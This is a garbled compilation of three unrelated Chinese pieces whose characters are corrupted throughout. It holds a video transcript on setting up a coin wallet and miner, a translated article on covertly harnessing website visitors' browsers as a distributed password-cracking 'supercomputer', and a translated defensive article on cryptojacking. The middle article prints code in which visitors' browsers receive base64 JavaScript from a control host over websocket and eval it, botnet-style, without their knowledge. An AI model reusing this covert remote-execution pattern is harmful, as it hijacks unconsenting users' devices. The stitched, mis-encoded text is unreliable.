始錄,說一下這個幣,這個幣是css的,這個幣有網(wǎng)友想挖,叫我演示一下怎么弄的。這個幣現(xiàn)在有這么多礦池,現(xiàn)在開始先弄錢包,這里是官方網(wǎng)站,先進(jìn)去一下,進(jìn)去以后點一下錢包,然后創(chuàng)建錢包,輸入密碼,輸兩次了,這個是有十二個助擊詞,這個是十二個詞的,先把它復(fù)制下來,因為這個或者是截圖下來復(fù)制不了,就截圖。
然后再點下一步,下一步就要確認(rèn),比如這個,那是第十一個詞是什么,然后選一下就行了。剛才那里第十一個詞是這個,這里是第七個詞,第四個是這個,已經(jīng)創(chuàng)建成功了,這個就是錢包,地址就出來了,有了地址就可以開始挖礦了。
這個窗口先別關(guān),等下要復(fù)制一下,再點這里,這里選擇一個礦池,就用這個算力最大的,這個算力大,這里有這么多可以用的服務(wù)器,有這么多地址可以用的,找個可以用的就行了。
下面是教你如何挖礦,挖礦可以,這個是windows版的,這是linux版的,這是哈瓦的,現(xiàn)在是windows版的,可以先下載一下軟件,這個軟件就這樣的,這個已經(jīng)提前下載好了,已經(jīng)解約好在這里了。
接著往后面看,換詞這里配置文件是這些,把它復(fù)制下來,到這里,隨便一個點b a t文件,給它配置一下就行了。這個是把這一行改成錢包地址,把地址復(fù)制下來,把它替換一下,把這些保存一下,改一下名字,好記一點。
現(xiàn)在運行一下,名稱有問題,把這個改了,文件名有問題,把它改成解壓這里的文件,現(xiàn)在再運行一下,現(xiàn)在就開始挖了,就這樣等著就可以了,如果挖到就會跑到在線錢包這里來,錢包如果要用就是一般是用這個,如果可以交易了,就可以點一下發(fā)送,把幣轉(zhuǎn)到哪個交易所去就可以了,轉(zhuǎn)多少,就這樣點一下發(fā)送就行了,實在看不懂就給它翻譯一下也行。
像現(xiàn)在很多瀏覽器都是帶翻譯功能的,翻譯一下,看一下大概就知道了,收件人地址,金額,備用,就這樣就行了,就這樣挖著就可以了,其他的不用管它,行了,先這樣。
擊關(guān)注 InfoQ,置頂公眾號
接收程序員的 8 點技術(shù)早餐
作者|Ben
編輯|Martin、郭蕾
出處丨聊聊架構(gòu)
最近比特幣大火,區(qū)塊鏈大火,昨天就連我一個四線城市的、沒怎么接觸過互聯(lián)網(wǎng)的小學(xué)同學(xué)都焦慮地打電話問我,區(qū)塊鏈這波浪潮里他應(yīng)該怎么掙錢。
聊聊架構(gòu)之前發(fā)布過一系列的文章來介紹區(qū)塊鏈技術(shù),想想真有意思,那會閱讀量怎么都做不高,但現(xiàn)在,又突然出來很多的區(qū)塊鏈媒體。當(dāng)然,我們也做了一個專注報道區(qū)塊鏈技術(shù)的公眾號:區(qū)塊鏈前哨,歡迎大家關(guān)注。
之前,我估計很多人都注意到過這樣一個新聞,有一些成人網(wǎng)站看到比特幣的暴漲之后,開始打起了挖礦的主意。他們在自己網(wǎng)站中偷偷暗藏挖礦代碼,而當(dāng)用戶訪問這些網(wǎng)站之后,他們就會神不知鬼不覺地迅速運行這些挖礦代碼,甚至在用戶關(guān)閉瀏覽器之后,相關(guān)代碼仍然能夠繼續(xù)運行并占用 CPU 資源。
今天這篇是篇翻譯文章,作者 Ben 是一名國外的資深開發(fā)者。他看到這篇新聞之后,也陷入了沉思。換個角度,如果不是挖礦,而是把全世界的 Web 瀏覽器通過 websocket 連接在一起,那是不是就可以組成一臺“超級計算機(jī)”,并利用這個超級計算機(jī)解決分布式問題?
于是他開始了新的嘗試。聊聊架構(gòu)對這篇文章進(jìn)行了翻譯,以下是全文。
寫在前面
我們將討論一個具有爭議性的話題——如何從網(wǎng)站訪客的瀏覽器中“偷”走計算資源。目前有很多討論是關(guān)于如何利用瀏覽器來挖掘數(shù)字貨幣的,但我不想加入到這些話題的討論當(dāng)中,我只是想探討一種有效利用計算資源的方式。
Web 瀏覽器執(zhí)行代碼的能力越來越強(qiáng)大。JavaScript 的發(fā)展、WebAssembly 的出現(xiàn)、對 GPU 訪問能力的提升和線程模型的演變,這些因素組合在一起,讓瀏覽器與計算機(jī)一樣具備了強(qiáng)大的計算能力。隨著瀏覽器數(shù)字貨幣挖礦機(jī)的崛起,我也在思考這樣的一個問題:如何把全世界的計算資源整合成一個單獨的實體——一臺由網(wǎng)站訪客的瀏覽器組成的超級計算機(jī)。
就像普通的計算機(jī)集群一樣,這臺超級計算機(jī)的所有計算節(jié)點在協(xié)調(diào)之下共同解決一個問題。但與普通的計算機(jī)集群不同的是,這些計算節(jié)點時臨時性的(隨著網(wǎng)站訪客的來來去去),而且它們之前無法彼此對話(沒有跨站點的請求)。
這是我想到的一個例子:
右邊是超級計算機(jī)控制服務(wù)器。左邊是訪問某個網(wǎng)站的瀏覽器,它是這個超級計算機(jī)中的一個節(jié)點,上面還顯示了它的 CPU 指標(biāo)。
這個超級計算機(jī)要解決的問題是找出某個給定哈希值的原始值。從圖上可以看出,總共有 23 個節(jié)點參與了計算,計算并比對了 380,204,032 個哈希值,其中美國的訪客貢獻(xiàn)了 50% 的處理能力。
代碼實現(xiàn)
這里主要用 websocket 技術(shù)在服務(wù)器和計算節(jié)點之間建立持久連接。這些連接用于協(xié)調(diào)節(jié)點的行為,從而讓它們成為相互協(xié)作的實體。websocket 可以傳輸代碼和協(xié)作消息,讓一切都成為可能。
websocket 的出現(xiàn)戲劇性地改變了 Web 客戶端的行為。客戶端連接到網(wǎng)站上,先執(zhí)行預(yù)先定義好的 JavaScript,等建立起 websocket 連接之后,就可以執(zhí)行其他任意 JavaScript 腳本。
下圖右邊是超級計算機(jī)控制服務(wù)器,左邊是接收動態(tài)指令的 Web 客戶端。
如果一款 App 使用了 WebView,JavaScript 就可以直接跑到 App 中,也就是說,通過 websocket 傳輸?shù)拇a可以跳過 WebView,直接進(jìn)入 App 的領(lǐng)地。
下圖右邊是超級計算機(jī)控制服務(wù)器,左邊是接收指令的 Web App。可以看到,指令直接滲透到了 App 層。
剩下的就沒有什么新鮮的了。App 可以通過 C&C 協(xié)議(Botnet Command and Control)獲取指令,網(wǎng)頁在初次加載之后就可以動態(tài)獲得 JavaScript 腳本,而 websocket 具有真正的動態(tài)性(不像 Ajax 的輪詢拉取模式),可以跨多瀏覽器和設(shè)備運行,而且對運行環(huán)境有完全的訪問權(quán)限。
所以,我們完全可以通過 websocket 向計算節(jié)點傳輸指令代碼,當(dāng)然也可以用來傳遞消息,實現(xiàn)分布式協(xié)調(diào)。
Crackzor.js
六年前,我基于 OpenMPI 開發(fā)了一款分布式密碼破解器(ben.akrin.com/?p=1424),叫作 crackzor。
密碼破解是一個非常典型的分布式問題,說起來很簡單,就是通過排列組合字符猜出密碼。我使用 JavaScript 重寫了 crackzor,使用 websocket 替代了 OpenMPI。
不過,每一個分布式問題都是不一樣的,crackzor 并不是解決所有問題的良方。crackzor 的魔力在于它的靈活性,它把一個字符排列組合空間拆分成很多個塊,再把這些塊分?jǐn)偨o計算節(jié)點。在給定了要解決的問題以及迭代的起始和結(jié)束位置之后,節(jié)點就可以開始工作,不需要再為它們提供字符排列組合,這樣就不會出現(xiàn)網(wǎng)絡(luò)帶寬瓶頸問題。
第一個問題:如何最大程度利用節(jié)點的 CPU
JavaScript 默認(rèn)使用的是單線程模型,代碼通過 websocket 傳送到客戶端,默認(rèn)情況下只使用了 CPU 的一個核。而現(xiàn)今的大部分計算機(jī) CPU 都是多核的,所以,我們要想辦法把這些 CPU 都利用起來。
于是救星出現(xiàn)了——Web Worker。HTML 5 提供了這一特性,極大簡化了多線程的實現(xiàn)。不過,我們還需要解決一個問題。Web Worker 文檔告訴我們要從文件加載腳本文件,但我們的代碼是通過 websocket 傳輸過來的,并駐存在內(nèi)存中,所以我們無法直接通過指定腳本文件的方式來執(zhí)行代碼。
我們通過把代碼包裝成一個 Blob 對象來解決這個問題:
var worker_code='alert( "this code is threaded on the nodes" );' window.URL=window.URL || window.webkitURL; var blob; try { blob=new Blob(\[worker_code\], {type: 'application/javascript'}); } catch (e) { window.BlobBuilder=window.BlobBuilder || window.WebKitBlobBuilder || window.MozBlobBuilder; blob=new BlobBuilder; blob.append(worker_code); blob=blob.getBlob; } workers.push( new Worker(URL.createObjectURL(blob)) ) ;
第二個問題:在節(jié)點間分配任務(wù)
Websocket 服務(wù)器承擔(dān)了后續(xù)的大部分協(xié)調(diào)工作,它需要跟蹤節(jié)點的接入和退出,以及某個節(jié)點是否在執(zhí)行計算任務(wù),并在有可用節(jié)點時給它們分配任務(wù)。
服務(wù)器需要一直處于運行狀態(tài),處理來自節(jié)點的連接。不過,這臺超級計算機(jī)可能每天需要解決不同的問題。為此,我寫了一個函數(shù)用來讀取文件,并執(zhí)行文件中的代碼。這個函數(shù)通過一個進(jìn)程來調(diào)用。
function eval\_code\_from_file { if( !file_exists("/tmp/code") ) { console.log( "error: file /tmp/code does not exist" ) ; } else { var code=read_file( "/tmp/code" ) ; code=code.toString ; eval( code ) ; } } process.on('SIGUSR1', eval\_code\_from_file.bind );
有了這個函數(shù),下一次我就可以殺掉舊進(jìn)程,然后使用新進(jìn)程加載新代碼。這要歸功于 JavaScript 的靈活性,這種靈活性讓我們可以在任意時刻運行任意代碼,只要對運行環(huán)境有完全的訪問權(quán)限。
要給節(jié)點分發(fā)任務(wù)也很簡單,只要讓客戶端在連接到服務(wù)器時注冊一個回調(diào)函數(shù),然后在回調(diào)函數(shù)里執(zhí)行代碼即可。
比如客戶端:
var websocket_client=io.connect("http://websocket_server.domain.com"); websocket_client.on( "eval_callback",function(data){data=atob(data),eval(data)}.bind ) ;
服務(wù)器端:
client_socket.emit( "eval_callback", new Buffer("alert('this code will run on the client');").toSt
到目前為止:
所有的臨時節(jié)點(網(wǎng)站用戶的 Web 瀏覽器)連接到 websocket 服務(wù)器上;
通過進(jìn)程信號讓 websocket 服務(wù)器執(zhí)行新的代碼;
新代碼中包含了節(jié)點需要解決的新問題;
新代碼告訴 websocket 服務(wù)器如何協(xié)調(diào)節(jié)點;
一旦某個節(jié)點解決了問題,接著處理下一個問題;
現(xiàn)在我們知道了如何利用 Web 瀏覽器來構(gòu)建一臺超級計算機(jī)。出于多方面的考慮,比如可讀性、安全性和復(fù)雜性方面的問題,我不想把我的代碼全部都公開出來。不過,如果有人感興趣,可以聯(lián)系我,我很樂意分享跟多的想法。
更多小建議
在拆分任務(wù)時,任務(wù)不能太大。因為節(jié)點都是臨時性的,如果任務(wù)太重,極有可能發(fā)生中斷。大部分 Web 瀏覽器會拒絕執(zhí)行或終止執(zhí)行太耗資源的代碼,而小任務(wù)可以在幾秒鐘之內(nèi)就完成,不會被打斷。
使用 JavaScript 實現(xiàn) MD5:https://gist.github.com/josedaniel/951664。
記錄節(jié)點解決問題所使用的平均時間,把運行緩慢的節(jié)點排除在外,以免影響“超級計算機(jī)”的整體性能。
密貨幣劫持(cryptojacking),也稱作挖礦劫持,是指未經(jīng)授權(quán)使用別人的計算機(jī)挖掘加密貨幣。
通常,黑客通過讓受害者點擊電子郵件中的惡意鏈接,將加密貨幣挖礦代碼加載到計算機(jī)上;或者使用JavaScript代碼感染網(wǎng)站或在線廣告,而JavaScript代碼將在受害者瀏覽器內(nèi)加載后自動執(zhí)行。
無論通過哪種方式,挖礦代碼將在后臺運行,而毫不知情的受害者可以正常使用計算機(jī)。他們可能注意到的唯一跡象是計算機(jī)性能下降或執(zhí)行滯后。
沒有人知道黑客通過挖礦劫持開采了多少加密貨幣,但毫無疑問這種做法日漸猖獗。
基于瀏覽器的挖礦劫持正在快速增長。去年11月,據(jù)Adguard報告,瀏覽器內(nèi)的挖礦劫持增長率為31%。Adguard研究發(fā)現(xiàn),共有33000個網(wǎng)站運行挖礦劫持腳本,而這些網(wǎng)站每月的訪問數(shù)量預(yù)計達(dá)到10億。今年2月,Bad Packets Report發(fā)現(xiàn)了34474個運行Coinhive的站點。Coinhive是最受歡迎的JavaScript挖礦程序,也被用于合法的加密貨幣挖礦活動。
網(wǎng)絡(luò)安全解決方案提供商WatchGuard Technologies的威脅情報分析師Marc Laliberte表示,“加密貨幣挖礦正處于初級階段,還有很多發(fā)展和演變的空間。”他指出,Coinhive程序易于部署,并且在第一個月就創(chuàng)造了30萬美元的價值。
“從那以后,Coinhive發(fā)展得很快。這樣賺錢真的很容易。”
1月份,研究人員發(fā)現(xiàn)了Smominru加密貨幣挖礦僵尸網(wǎng)絡(luò),該蠕蟲感染了超過50萬臺機(jī)器,主要集中在俄羅斯、印度和臺灣地區(qū)。僵尸網(wǎng)絡(luò)的目標(biāo)是讓W(xué)indows服務(wù)器挖掘門羅幣(Monero)。網(wǎng)絡(luò)安全公司Proofpoint估計,截至1月底,它已經(jīng)創(chuàng)造了360萬美元的價值。
挖礦劫持甚至不需要擁有重要的技術(shù)能力。根據(jù)Digital Shadows的報告《新淘金熱:加密貨幣成為欺詐的新領(lǐng)域》,挖礦劫持工具包在暗網(wǎng)只賣30美元。
挖礦劫持越來越受黑客歡迎的一個原因是風(fēng)險更低卻能獲得更多金錢。SecBI的CTO兼聯(lián)合創(chuàng)始人Alex Vaystikh表示:“對于黑客來說,挖礦劫持是比勒索軟件更廉價、更有利可圖的替代品。”如果使用勒索軟件,黑客每次感染100臺計算機(jī),或許只能讓3個人付費。而使用挖礦劫持,被感染的100臺計算機(jī)都可以用來挖掘加密貨幣。他解釋說,雖然通過挖礦劫持和使用勒索軟件獲得的金錢可能一樣多,但是挖礦可以不斷地產(chǎn)生價值。
另外,挖礦劫持被發(fā)現(xiàn)和識別的風(fēng)險也遠(yuǎn)低于勒索軟件。挖礦代碼將靜默運行,并且可能很長時間不被發(fā)現(xiàn);就算被發(fā)現(xiàn),也很難追溯到源頭。因為沒有任何東西被盜或被加密,受害者沒有什么動機(jī)去追溯。黑客傾向于選擇Monero和Zcash等匿名加密貨幣,而不是比特幣,因為很難追蹤這些貨幣背后的非法行為。
黑客主要通過兩種方式讓受害者的計算機(jī)悄悄地挖掘加密貨幣。
一種方法是誘導(dǎo)受害者將挖礦代碼加載到計算機(jī)上。通過類似網(wǎng)絡(luò)釣魚的方法完成劫持:受害者收到一封看似合法的電子郵件,誘導(dǎo)他們點擊鏈接。這個鏈接會運行代碼,將挖礦腳本加載到計算機(jī)上。受害者使用計算機(jī)時,挖礦腳本代碼可以在后臺運行。
另一種方法是在可以大量傳播的網(wǎng)站或廣告里植入腳本。一旦受害者訪問被感染的網(wǎng)站或者點擊瀏覽器彈出的廣告,腳本將自動執(zhí)行。沒有代碼存儲在受害者的計算機(jī)上。
無論使用哪種方法,挖礦代碼都會利用受害者的計算機(jī)挖礦,并將結(jié)果發(fā)送到黑客控制的服務(wù)器。
黑客通常會使用這兩種方法來獲取最大化的回報。Vaystikh表示:“攻擊者會使用惡意軟件技術(shù)作為備用,向受害者的計算機(jī)發(fā)送更可靠和持久的惡意軟件。”例如,在100臺為黑客挖掘加密貨幣的設(shè)備中,其中10%可能通過受害者設(shè)備上的代碼產(chǎn)生收入,90%則通過他們的網(wǎng)絡(luò)瀏覽器實現(xiàn)。
與大多數(shù)其他類型的惡意軟件不同,挖礦劫持腳本不會損害計算機(jī)或者受害者的數(shù)據(jù)。它們竊取的是CPU處理資源。對于個人用戶來說,計算機(jī)性能變慢可能只是一個煩惱。而對于企業(yè)來說,如果很多系統(tǒng)被劫持挖礦,可能會增加成本。為了解決問題,服務(wù)臺和IT部門需要花費時間追蹤性能問題并更換組件或系統(tǒng)。
挖礦劫持者很聰明,設(shè)計了很多方案來利用他人的電腦挖掘加密貨幣。大部分的方案并不新奇,其傳播方式通常借鑒其他惡意軟件(如勒索軟件或廣告軟件)的方法。以下是一些真實發(fā)生的案例:
在今年的EmTech數(shù)字會議上,Darktrace講述了一家歐洲銀行的故事。這家銀行的服務(wù)器出現(xiàn)了異常流量,在夜間運行緩慢,但是銀行的診斷工具沒有發(fā)現(xiàn)任何異常。Darktrac發(fā)現(xiàn),在那段時間里有新服務(wù)器上線,而銀行表示并沒有這些服務(wù)器。最后,Darktrac對數(shù)據(jù)中心進(jìn)行實地檢查時發(fā)現(xiàn),一名流氓員工在地板下建了一個加密貨幣挖礦系統(tǒng)。
3月份,Avast軟件公司報告稱,挖礦劫持者正在將GitHub作為惡意挖礦軟件的宿主。他們找到合法的項目,從中創(chuàng)建一個分叉項目;然后將惡意軟件隱藏在該分叉項目的目錄結(jié)構(gòu)中。挖礦劫持者通過使用網(wǎng)絡(luò)釣魚方案引誘用戶下載該惡意軟件,例如提醒更新Flash播放器或者偽裝成一個成人游戲網(wǎng)站。
挖礦劫持者發(fā)現(xiàn)了一個rTorrent錯誤配置漏洞,無需進(jìn)行XML-RPC通信驗證即可訪問一些rTorrent客戶端。他們掃描互聯(lián)網(wǎng)尋找未打補丁的客戶端,然后在客戶端上部署Monero挖礦軟件。F5 Networks在2月份報告了這個漏洞,并建議rTorrent用戶確保其客戶端不接受外部連接。
這種惡意軟件最早是由卡巴斯基實驗室于2017年發(fā)現(xiàn)的,它是一款谷歌瀏覽器插件,使用Facebook Messenger來感染用戶的計算機(jī)。最初,F(xiàn)acexworm用于傳播廣告軟件。今年早些時候,趨勢科技發(fā)現(xiàn)了多種面向加密貨幣兌換的Facexworm,并且能夠傳播加密貨幣挖礦代碼。它仍然使用被感染的Facebook帳戶來傳播惡意鏈接,但也可以竊取網(wǎng)絡(luò)帳戶和憑證,從而允許它將挖礦劫持代碼植入到這些網(wǎng)頁。
5月份,360安全衛(wèi)士發(fā)現(xiàn)了可以迅速傳播的挖礦劫持程序WinstarNssmMiner。這個惡意程序的特別之處在于,卸載它會讓受害者的計算機(jī)崩潰。WinstarNssmMiner首先啟動svchost.exe進(jìn)程并向其植入代碼,然后將該進(jìn)程的屬性設(shè)置為CriticalProcess。由于計算機(jī)將其視為關(guān)鍵進(jìn)程,因此一旦強(qiáng)制結(jié)束該進(jìn)程,計算機(jī)就會藍(lán)屏。
如何預(yù)防挖礦劫持?
如果遵循這些步驟,可以最大限度地降低公司被劫持挖礦的風(fēng)險:
Laliberte認(rèn)為培訓(xùn)會有幫助,網(wǎng)絡(luò)釣魚將繼續(xù)成為攻擊者發(fā)送各種惡意軟件的主要方式。而針對通過訪問合法網(wǎng)站自動執(zhí)行挖礦劫持的方式, Vaystikh表示,培訓(xùn)效果不佳,因為你沒辦法告訴用戶不能訪問哪些網(wǎng)站。
由于挖礦劫持腳本通常通過網(wǎng)絡(luò)廣告進(jìn)行傳播,因此安裝廣告攔截器可能是阻止它們的有效手段。Ad Blocker Plus等廣告攔截器具備檢測挖礦腳本的功能。Laliberte推薦No Coin和MinerBlock等可以檢測和攔截挖礦腳本的瀏覽器插件。
許多端點保護(hù)/防病毒軟件供應(yīng)商已經(jīng)添加了檢測挖礦程序的功能。Anomali安全策略總監(jiān)Travis Farral說:“防病毒是終端預(yù)防挖礦劫持的方法之一。如果這個程序是已知的,那就很可能被檢測出來。”他補充道,需要注意的是挖礦程序的編寫者正在不斷改變技術(shù),避免被端點檢測到。
如果已經(jīng)確定一個網(wǎng)站正在運行挖礦腳本,請確保所有用戶不會再訪問該網(wǎng)站。
一些攻擊者正在使用瀏覽器惡意插件或者被感染的合法插件來執(zhí)行加密貨幣挖礦腳本。
自帶設(shè)備(BYOD)策略可以有效預(yù)防非法的加密貨幣挖礦行為。Laliberte認(rèn)為,MDM可以長期保持自帶設(shè)備的安全。MDM解決方案可以幫助企業(yè)管理用戶設(shè)備上的應(yīng)用和插件。MDM解決方案傾向于面向大型企業(yè),小型企業(yè)通常負(fù)擔(dān)不起。不過,Laliberte指出,移動設(shè)備不像臺式電腦和服務(wù)器那么危險。因為移動設(shè)備的處理能力往往較低,所以對黑客來說并不是很賺錢。
?
與勒索軟件一樣,盡管企業(yè)竭盡全力去阻止挖礦劫持,還是可能受到影響。企業(yè)可能很難檢測挖礦劫持,特別是在只有少數(shù)系統(tǒng)受到損害的情況下。以下是有效的方法:
SecBI的Vaystikh表示,有時候,挖礦劫持的第一個跡象就是服務(wù)臺收到用戶關(guān)于計算機(jī)性能下降的抱怨。企業(yè)應(yīng)該對此予以重視,并進(jìn)一步進(jìn)行調(diào)查。
服務(wù)臺應(yīng)該尋找的其他信號是可能導(dǎo)致CPU或散熱風(fēng)扇故障的系統(tǒng)過熱。Laliberte指出,因為CPU使用率過高,系統(tǒng)過熱會造成損壞,并可能縮短設(shè)備的使用周期。對于平板電腦和智能手機(jī)等移動設(shè)備更是如此。
Vaystikh認(rèn)為,企業(yè)網(wǎng)絡(luò)中的挖礦劫持比家庭網(wǎng)絡(luò)更容易檢測,因為大多數(shù)消費者端點解決方案都無法檢測到它。挖礦劫持很容易通過網(wǎng)絡(luò)監(jiān)控解決方案進(jìn)行檢測,而大多數(shù)企業(yè)都有網(wǎng)絡(luò)監(jiān)控工具。
不過,即便擁有網(wǎng)絡(luò)監(jiān)控工具和數(shù)據(jù),很少有企業(yè)可以有工具和能力來分析這些信息,從而進(jìn)行準(zhǔn)確的檢測。例如,SecBI開發(fā)了一個AI解決方案來分析網(wǎng)絡(luò)數(shù)據(jù),并檢測挖礦劫持和其他特定威脅。
Laliberte認(rèn)為,網(wǎng)絡(luò)監(jiān)測是檢測挖礦劫持的最佳選擇。審查所有網(wǎng)絡(luò)流量的網(wǎng)絡(luò)周邊監(jiān)控方案,更有可能檢測出挖礦行為。許多監(jiān)控解決方案將深入檢測每一個用戶,以便確定哪些設(shè)備受到影響。
Farral表示,如果企業(yè)服務(wù)器配備了靠譜的過濾器來監(jiān)控出口端點的網(wǎng)絡(luò)連接請求,那么可以很好地檢測出惡意挖礦軟件。不過,他警告說,挖礦軟件的編程者有能力改寫惡意軟件,來規(guī)避這個檢測方法。
Farral警告說,挖礦劫持者正設(shè)法在Web服務(wù)器上植入一些Javascript代碼。服務(wù)器本身并不是其攻擊目標(biāo),但是任何訪問該網(wǎng)站的人都有感染的風(fēng)險。他建議企業(yè)定期監(jiān)視Web服務(wù)器上的文件更改情況或者自行更改頁面。
挖礦劫持的傳播方式和挖礦代碼本身在不斷發(fā)展。Farral表示,了解挖礦劫持軟件和劫持行為可以幫助企業(yè)檢測挖礦劫持。一個精明的企業(yè)會跟進(jìn)事情的最新進(jìn)展。如果掌握了挖礦劫持的傳播機(jī)制,就知道某個特定的開發(fā)工具包正在發(fā)送挖礦代碼。保護(hù)開發(fā)工具包,也將成為預(yù)防挖礦劫持的措施。
?
對于瀏覽器內(nèi)的JavaScript劫持攻擊,一旦檢測到挖礦劫持,就應(yīng)該關(guān)閉運行惡意腳本的瀏覽器標(biāo)簽頁。IT部門應(yīng)該注意發(fā)送腳本的網(wǎng)站URL,并更新企業(yè)的網(wǎng)頁過濾器進(jìn)行攔截。企業(yè)可以考慮部署反挖礦工具,幫助防止未來的攻擊。
Laliberte表示,如果一個插件感染了瀏覽器,關(guān)閉標(biāo)簽頁將無濟(jì)于事。這時應(yīng)該更新所有插件,并刪除不需要或已經(jīng)感染的插件。
借助這些經(jīng)驗更好地了解攻擊者是如何危害系統(tǒng)的。更新企業(yè)的用戶、服務(wù)臺和IT培訓(xùn)內(nèi)容,以便他們更好地識別挖礦劫持并采取相應(yīng)的行動。
來源:Odaily星球日報
本文翻譯自 www.csoonline.com ?
原文鏈接:https://www.csoonline.com/article/3253572/internet/what-is-cryptojacking-how-to-prevent-detect-and-recover-from-it.html????
*請認(rèn)真填寫需求信息,我們會在24小時內(nèi)與您取得聯(lián)系。